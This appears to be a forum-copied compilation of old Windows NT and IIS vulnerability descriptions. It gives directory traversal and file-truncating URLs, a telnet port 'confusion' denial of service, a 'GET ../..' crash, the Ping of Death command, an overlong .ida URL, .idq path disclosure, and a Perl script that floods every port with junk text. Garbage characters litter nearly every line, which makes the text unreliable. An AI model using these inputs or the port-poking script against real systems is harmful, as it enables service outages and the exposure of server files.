NT的漏洞及描述(英文）

受影响系统:4.0,iis 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
0 D' }$ J- [3 `
. z% b6 L1 j$ X% f; k4 ~: q$ ]A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.
$ Y. ^: o) f8 h+ g  k: t
; m/ v: ~' t( i5 i! S1 M! eBy default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
8 m7 w" l) m+ ?' c, v9 n3 i
4 f$ ]5 F3 Y1 y4 @( }1 t( O" k--------------------------------------------------------------------
( i* M( |7 \/ d* i. }
受影响系统:4.0
: L, {; a. s( `  P# K, xA URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.
' q$ |! h& r  i* M* n% I
If the file 'target.bat' exists, the file will be truncated.


! m  Z  W3 i" uA URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.
& `7 w5 G0 D- K5 b/ R( A
1 e4 Z; H" g" Q$ x" |/ `----------------------------------------------------------------------
1 ?7 f  D/ T5 l* d- q
受影响系统:3.51,4.0
! r3 H; D: E* c! o; ]) hMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.

4 E; n4 I- y; d: Q2 p% E: t# GThe following steps;
; C& C; j3 v" W4 ?" o: [
2 N, c. k" p' e& s3 aTelnet to an NT 4.0 system on port 135
Type about 10 characters followed by a <CR>
Exit Telnet
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
* Y( \. R) y: e$ o) [
When launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.

, }4 t7 L, @. T* }The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

3 S; h" U* G" A% l5 L  M* T: GThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):

/*begin poke code*/
- ^, j+ Y7 d  J# t9 Y
use Socket;
use FileHandle;
require "chat2.pl";
% W% u/ A6 S6 a1 C# U) y# J  q
5 g# x1 {( [- k$systemname = $ARGV[0] && shift;

$verbose = 1; # tell me what you're hitting
; h" Z2 M, `& ]$knownports = 1; # don't hit known problem ports
for ($port = $0; $port<65535; $port++)
{

0 M. {8 s/ @; t$ G; A4 [; l
if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
) q  g. N) w3 T  Q7 Q+ Nnext;
}
! c& |+ v4 C0 Z; }$fh = chat::open_port($systemname, $port);
chat::print ($fh,"This is about ten characters or more");
if ($verbose) {
. d% [3 @6 w0 |print "Trying port: $port\n";
}
* e: B3 H- D$ P9 I6 t( fchat::close($fh);

  }* r' x8 C, P* r. m  s}


/*end poke code*/
9 K8 g* G, M3 Y
, S! b; j) I. X: _Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
/ V1 S3 e: T/ d9 g% S( O
--------------------------------------------------------------------------------
' }: u4 Q9 @  G1 G- s
5 d# O/ E! `, [1 L8 I6 o受影响系统:4.0
Using a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.
9 D9 E" |6 d# ]7 H
This attack causes Dr. Watson to display an alert window and to log an error:

"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

--------------------------------------------------------------------------------

& A) K% N1 B9 r* J8 `受影响系统:3.51,4.0
$ }+ C; c" t, S) |Large packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
. e% b2 W& D/ |9 C
, Z' w8 O8 ]  tSTOP: 0X0000001E
KMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-
. R. w6 [# w% @# I
STOP: 0x0000000A
IRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS

NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.

1 j5 a: b: \$ C/ w* h, u( R--------------------------------------------------------------------------------
! ?: m) G! S; _4 i5 b4 S* L
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).

--------------------------------------------------------

" f3 G  y+ v2 V5 j; H% MIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server